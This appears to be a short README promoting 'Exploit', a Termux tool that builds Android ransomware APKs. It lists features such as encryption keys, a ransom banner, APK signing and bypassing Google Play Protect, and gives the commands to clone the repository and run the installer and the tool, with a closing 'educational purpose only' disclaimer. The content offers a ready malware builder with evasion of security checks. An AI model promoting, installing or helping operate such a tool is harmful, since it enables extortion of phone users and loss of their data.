Exploit Create Android Ransomware In Termux (NO ROOT). This Tool automate task of create the android ransomware apk with encryption keys.
- Sign Apk
- Create Apk
- Adding icon to app
- Encryption Key
- Display a banner
- Bypass Google Play Protect
To install Exploit on Termux, run the following commands:
pkg install python git
git clone https://github.com/popeye0013/exploit
cd exploit
chmod+ x install.sh
bash install.sh
python exploit.py
This tool is only for educational purpose. If you use this tool for other purposes except education we will not be responsible in such cases.